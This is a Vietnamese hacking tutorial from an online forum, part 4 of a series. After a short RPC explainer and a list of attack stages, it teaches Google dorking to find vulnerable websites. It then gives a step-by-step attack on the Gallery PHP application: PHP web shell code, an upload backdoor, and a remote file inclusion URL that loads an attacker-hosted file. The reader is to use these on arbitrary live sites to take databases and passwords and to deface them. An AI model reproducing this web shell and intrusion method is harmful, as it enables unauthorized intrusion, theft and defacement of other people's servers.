Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 4 - 7/12/2004 10h:37

(Trích quan tri mang)

26 . ) T́m hiểu về RPC (Remote Procedure Call) :

_ Windows NT cung cấp khả năng sử dụng RPC để thực thi các ứng dụng phân tán . Microsoft RPC bao gồm các thư viện và các dịch vụ cho phép các ứng dụng phân tán hoạt động được trong môi trường Windows NT. Các ứng dụng phân tán chính bao gồm nhiều tiến tŕnh thực thi với nhiệm vụ xác định nào đó. Các tiến tŕnh này có thể chạy trên một hay nhiều máy tính.

_Microsoft RPC sử dụng name service provider để định vị Servers trên mạng. Microsoft RPC name service provider phải đi liền với Microsoft RPC name service interface (NIS). NIS bao bao gồm các hàm API cho phép truy cập nhiều thực thể trong cùng một name service database (name service database chứa các thực thể, nhóm các thực thể, lịch sử các thực thể trên Server).
Khi cài đặt Windows NT, Microsoft Locator tự động được chọn như là name service provider. Nó là name service provider tối ưu nhất trên môi trường mạng Windows NT.

27 . ) Kỹ thuật đơn giản để chống lại sự xâm nhập trái phép khi đang online thông qua RPC (Remote Procedure Call) :

_ Nếu bạn nghi ngờ máy của ḿnh đang có người xâm nhập hoặc bị admin remote desktop theo dơi , bạn chỉ cần tắt chức năng remote procedure call th́ hiện tại không có chương tŕnh nào có thể remote desktop để theo dơi bạn được . Nó c̣n chống được hầu hết tools xâm nhập vào máy ( v́ đa số các tools viết connect dựa trên remote procedure call ( over tcp/ip )).Các trojan đa số cũng dựa vào giao thức này.

Cách tắt: Bạn vào service /remote procedure call( click chuột phải ) chọn starup typt/disable hoặc manual/ apply.

Đây là cách chống rất hữu hiệu với máy PC , nếu thêm với cách tắt file sharing th́ rất khó bị hack ) ,nhưng trong mạng LAN bạn cũng phiền phức với nó không ít v́ bạn sẽ không chạy được các chương tŕnh có liên quan đến thiết bị này . Tùy theo cách thức bạn làm việc mà bạn có cách chọn lựa cho hợp lư . Theo tôi th́ nếu dùng trong mạng LAN bạn hăy cài một firewall là chắc chắn tương đối an toàn rồi đó .

( Dựa theo bài viết của huynh “Đời như củ khoai ” khoaimi – admin của HVA )

28 . ) Những bước để hack một trang web hiện nay :

_ Theo liệt kê của sách Hacking Exposed 3 th́ để hack một trang Web thông thường ta thực hiện những bước sau :
+ FootPrinting : ( In dấu chân )
Đây là cách mà hacker làm khi muốn lấy một lượng thông tin tối đa về máy chủ/doanh nghiệp/người dùng. Nó bao gồm chi tiết về địa chỉ IP, Whois, DNS ..v.v đại khái là những thong tin chính thức có lien quan đến mục tiêu. Nhiều khi đơn giản hacker chỉ cần sử dụng các công cụ t́m kiếm trên mạng để t́m những thong tin đó.
+ Scanning : ( Quét thăm ḍ )
Khi đă có những thông tin đó rồi, th́ tiếp đến là đánh giá và định danh những những dịch vụ mà mục tiêu có. Việc này bao gồm quét cổng, xác định hệ điều hành, .v.v.. Các công cụ được sử dụng ở đây như nmap, WS pingPro, siphon, fscam và c̣n nhiều công cụ khác nữa.
+ Enumeration : ( liệt kê t́m lỗ hổng )
Bước thứ ba là t́m kiếm những tài nguyên được bảo vệ kém, hoạch tài khoản người dùng mà có thể sử dụng để xâm nhập. Nó bao gồm các mật khẩu mặc định, các script và dịch vụ mặc định. Rât nhiều người quản trị mạng không biết đến hoặc không sửa đổi lại các giá trị này.
+ Gaining Access: ( T́m cách xâm nhập )
Bây giờ kẻ xâm nhập sẽ t́m cách truy cập vào mạng bằng những thông tin có được ở ba bước trên. Phương pháp được sử dụng ở đây có thể là tấn công vào lỗi tràn bộ đệm, lấy và giải mă file password, hay thô thiển nhất là brute force (kiểm tra tất cả các trường hợp) password. Các công cụ thường được sử dụng ở bước này là NAT, podium, hoặc L0pht.
+ Escalating Privileges : ( Leo thang đặc quyền )
Ví dụ trong trường hợp hacker xâm nhập đựợc vào mạng với tài khoản guest, th́ họ sẽ t́m cách kiểm soát toàn bộ hệ thống. Hacker sẽ t́m cách crack password của admin, hoặc sử dụng lỗ hổng để leo thang đặc quyền. John và Riper là hai chương tŕnh crack password rất hay được sử dụng.
+ Pilfering : ( Dùng khi các file chứa pass bị sơ hở )
Thêm một lần nữa các máy t́m kiếm lại đựơc sử dụng để t́m các phương pháp truy cập vào mạng. Những file text chứa password hay các cơ chế không an toàn khác có thể là mồi ngon cho hacker.
+ Covering Tracks : ( Xoá dấu vết )
Sau khi đă có những thông tin cần thiết, hacker t́m cách xoá dấu vết, xoá các file log của hệ điều hành làm cho người quản lư không nhận ra hệ thống đă bị xâm nhập hoặc có biêt cũng không t́m ra kẻ xâm nhập là ai.
+ Creating ``Back Doors`` : ( Tạo cửa sau chuẩn bị cho lần xâm nhập tiếp theo được dễ dàng hơn )
Hacker để lại ``Back Doors``, tức là một cơ chế cho phép hacker truy nhập trở lại bằng con đường bí mật không phải tốn nhiều công sức, bằng việc cài đặt Trojan hay tạo user mới (đối với tổ chức có nhiều user). Công cụ ở đây là các loại Trojan, keylog…
+ Denial of Service (DoS) : ( Tấn công kiểu từ chối dịch vụ )
Nêu không thành công trong việc xâm nhập, th́ DoS là phương tiện cuối cùng để tấn công hệ thống. Nếu hệ thống không được cấu h́nh đúng cách, nó sẽ bị phá vỡ và cho phép hacker truy cập. Hoặc trong trường hợp khác th́ DoS sẽ làm cho hệ thống không hoạt động được nữa. Các công cụ hay được sử dụng để tấn công DoS là trin00, Pong Of Death, teardrop, các loại nuker, flooder . Cách này rất lợi hại , và vẫn c̣n sử dụng phổ biến hiện nay .
_ Tuỳ theo hiểu biết và tŕnh độ của ḿnh mà một hacker bỏ qua bước nào . Không nhất thiết phảI làm theo tuần tự . Các bạn hăy nhớ đến câu “ biết người biết ta trăm trận trăm thắng ” .

( Tài liệu của HVA và hackervn.net )

29 . ) Cách t́m các Website bị lỗi :

_ Chắc các bạn biết đến các trang Web chuyên dùng để t́m kiếm thông tin trên mạng chứ ? Nhưng các bạn chắc cũng không ngờ là ta có thể dùng những trang đó để t́m những trang Web bị lỗi ( Tôi vẫn thường dùng trang google.com và khuyên các bạn cũng nên dùng trang này v́ nó rất mạnh và hiệu quả ) .
_ Các bạn quan tâm đến lỗi trang Web và muốn t́m chúng bạn chỉ cần vào google.com và đánh đoạn lỗi đó vào sau “allinurl : ” . VD ta có đoạn mă lỗi trang Web sau :

cgi-bin/php.cgi?/etc/passwd

các bạn sẽ đánh :

“allinurl:cgi-bin/php.cgi?/etc/passwd”

Nó sẽ liệt kê ra những trang Web đang bị lỗi này cho các bạn , các bạn hăy nh́n xuống dưới cùng của mỗi mẫu liệt kê ( ḍng địa chỉ màu xanh lá cây ) nếu ḍng nào viết y chang từ khoá ḿnh nhập vào th́ trang đó đă hoặc đang bị lỗi .Các bạn có xâm nhập vào được hay không th́ cũng c̣n tuỳ vào trang Web đó đă fix lỗi này hay chưa nữa .
_ Các bạn quan tâm đến lỗi forum , các bạn muốn t́m forum dạng này để thực tập , chỉ cần nhập từ khoá

powered by

VD sau là để t́m forum dùng Snitz 2000 :

powered by Snitz 2000

_ Tuy nhiên , việc t́m ra đúng forum hoặc trang Web bị lỗi theo cách đó có xác suất không cao , bạn hăy quan tâm đến đoạn string đặc biệt trong URL đặc trưng cho từng kiểu trang Web hoặc forum đó ( cái này rất quan trọng , các bạn hăy tự ḿnh t́m hiểu thêm nhé ) . VD t́m với lỗi Hosting Controller th́ ta sẽ có đoạn đặc trưng sau

``/admin hay /advadmin hay /hosting``

ta hăy đánh từ khoá :

allinurl:/advadmin
hoặc allinurl:/admin
hoặc allinurl:/hosting

Nó sẽ liệt kê ra các trang Web có URL dạng :

http://tentrangweb.com/advadmin
hoặc http://tentrangweb.com/admin
hoặc http://tentrangweb.com/hosting

VD với forum UBB có đoạn đặc trưng

``cgi-bin/ultimatebb.cgi?``

Ta cũng t́m tương tự như trên .
Chỉ cần bạn biết cách t́m như vậy rồi th́ sau này chỉ cần theo dơi thông tin cập nhật bên trang “Lỗi bảo mật” của HVA do bạn LeonHart post hằng ngày các bạn sẽ hiểu được ư nghĩa của chúng và tự ḿnh kiểm tra .

30 . ) Kỹ thuật hack Web thông qua lỗi Gallery ( một dạng của lỗi php code inject ):

_ Gallery là một công cụ cho phép tạo một gallery ảnh trên web được viết bằng PHP , lợi dụng sơ hở này ta có thể lợi dụng để viết thêm vào đó một mă PHP cho phép ta upload , đó chính là mục đích chính của ta .
_ Trước hết bạn hăy đăng kư một host miễn phí , tốt nhất là bạn đăng kư ở brinkster.com cho dễ . Sau đó bạn mở notepad và tạo file PHP với đoạn mă sau :

CODE
<?php
global $PHP_SELF;
echo ``
<form method=post action=$PHP_SELF?$QUERY_STRING >
<input type=text name=shell size=40 >
<input type=hidden name=act value=shell >
<input type=submit value=Go name=sm >
``;
set_magic_quotes_runtime(1);
if ($act == ``shell``) {
echo ``\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n< xmp > ``;
system($shell);
echo ``

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n``; }
echo `` ``;
? >


Đoạn mă này bạn hăy tạo làm 2 file có tên khác nhau ( nhưng cùng chung một mă ) và đặt tên là :
+ shellphp.php : file này dùng để chạy shell trên victim host .
+ init.php : file này dùng để upload lên trang có host bạn vừa tạo . ( Bạn hăy upload file init.php này lên sớm v́ ta sẽ c̣n sử dụng nó nhưng với đoạn mă khác , bạn quên upload file này lên là tiêu )

Bạn hăy tạo thêm một file PHP với mă sau :

CODE
<?php
function handleupload() {
if (is_uploaded_file($_FILES[`userfile`][`tmp_name`])) {
$filename = $_FILES[`userfile`][`tmp_name`];
print ``$filename was uploaded successfuly``;
$realname = $_FILES[`userfile`][`name`];
print ``realname is $realname\n``;
print ``copying file to uploads dir ``.$realname;
copy($_FILES[`userfile`][`tmp_name`],*PATH*.$realna me); // lưu ư *PATH* chúng ta sẽ thay đổi sau
} else {
echo ``Possible file upload attack: filename``.$_FILES[`userfile`][`name`].``.``;
}
}
if ($act == ``upload``) {
handleupload();
}
echo ``
<form ENCTYPE=multipart/form-data method=post action=$PHP_SELF?$QUERY_STRING >
File:<INPUT TYPE=FILE NAME=userfile SIZE=35 >
<input type=hidden name=MAX_FILE_SIZE value=1000000 >
<input type=hidden name=act value=upload >
<input type=submit value=Upload name=sm >

``;
? >


Bạn hăy đặt tên là upload.php , nó sẽ dùng để upload lên trang Web của nạn nhân .
_ Tiếp theo Bạn vào Google, gơ ``Powered by gallery`` rồi enter, Google sẽ liệt kê một đống những site sử dụng Gallery , bạn hăy chọn lấy một trang bất kỳ rồI dùng link sau để thử xem nó c̣n mắc lỗI Gallery hay không :

http:// trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Nếu bạn thấy hiện lên một ô h́nh chữ nhật ở phía trên cùng , bên phải của nó là ô lệnh chuyển tiếp có chữ “Go” là coi như bạn đă t́m thấy được đốI tượng rồi đó . Bây giờ bạn đă có thể gơ lệnh thông qua ô chữ nhật đó để hack Web của nạn nhân .
Trước hết bạn hăy gơ lệnh “pwd” để xác định đường dẫn tuyệt đối đến thư mục hiện thời rồi nhấn nút “Go” , khi nó cho kết quả bạn hăy nhanh chóng ghi lại đường dẫn ở phía dướI ( Tôi sẽ sử dụng VD đường dẫn tôi t́m thấy là “/home/abc/xyz/gallery” ).
Sau đó bạn đánh tiếp lệnh “|s –a|” để liệt kê các thư mục con của nó . Bây giờ bạn hăy nh́n kết quả , bạn sẽ thấy một đống các thư mục con mà ta đă liệt kê . Bạn hăy luôn nhớ là mục đích của chúng ta là t́m một thư mục có thể dùng để upload file upload.php mà ta đă chuẩn bị từ trước do đó bạn hăy xác định cùng tôi bằng cách nh́n vào những chữ cuốI cùng của mỗi hàng kết quả :
+ Bạn hăy loại bỏ trường hợp các thư mục mà có dấu “.” hoặc “..” v́ đây là thư mục gốc hoặc là thư mục ảo ( Nó thường được xếp trên cùng của các hàng kết quả ) .
+ Bạn cũng loạI bỏ những hàng có chữ cuối cùng có gắn đuôi ( VD như config.php , check.inc .v.v… ) v́ đây là những file chứ không phải là thư mục .
+ C̣n lại là những thư mục có thể upload nhưng tôi khuyên bạn nên chọn những hàng chứa tên thư mục mà có chứa số lớn hơn 1 ( Bạn có thể xác định được chúng bằng cách nh́n cột thứ 2 từ trái sang ) , v́ như vậy vừa chắc chắn đây là thư mục không phải thư mục ảo , vừa làm cho admin của trang Web đó khó phát hiện khi ta cài file của ta vào . Tôi VD tôi phát hiện ra thư mục “loveyou” có chứa 12 file có thể cho ta upload , như vậy đường dẫn chính thức mà ta upload lên sẽ là :

/home/abc/xyz/Gallery/loveyou

Bây giờ bạn hăy vào account host của bạn, sửa nội dung file init.php giống như mă của file upload.php, nhưng sửa lại *PATH* thành “/home/abc/xyz/gallery/loveyou/ ”. Đồng thời cũng chuẩn bị một file upload.php trên máy của bạn với *PATH* là “” ( 2 dấu ngoặc kép ).
Bây giờ là ta đă có thể upload file upload.php lên trang Web của nạn nhân được rồi , bạn hăy nhập địa chỉ sau trên tŕnh duyệt Web của bạn :

http:// trang Web của nạn nhân > /gallery./captionator.php?GALLERY_BASEDIR=http://ww wxx.brinkster.com/ /

Bạn sẽ thấy xuất hiện tiếp một khung h́nh chữ nhật và bên cạnh là có 2 nút lệnh , một là nút “brown” , một là nút “upload” . Nút “brown” bạn dùng để dẫn đến địa chỉ file upload.php bạn đă chuẩn bị trên máy của bạn , nút “upload” khi bạn nhấn vào đó th́ nó sẽ upload file upload.php lên trang Web của nạn nhân . Ok , bây giờ coi như bạn đă hoàn thành chặng đường hack Web rồi đó . Từ bây giờ bạn hăy vận dụng để tấn công đối thủ như lấy database , password ( làm tương tự như các bài hướng dẫn hack trước ) , nhưng các bạn chỉ nên thực tập chứ đừng xoá database hay phá Web của họ. Nếu là một hacker chân chính các bạn chỉ cần upload lên trang Web ḍng chữ : “Hack by ……..” là đủ rồi .
Cũng như những lần trước , các bạn có thành công hay không cũng tuỳ thuộc vào sự may mắn và kiên tŕ nghiên cứu vận dụng kiến thức của các bạn .

( Dựa theo hướng dẫn hack của huynh vnofear – viethacker )


GOODLUCK!!!!!!!!!!!!

( Hết phần 4 )

Tác giả: Anhdenday - HVAonline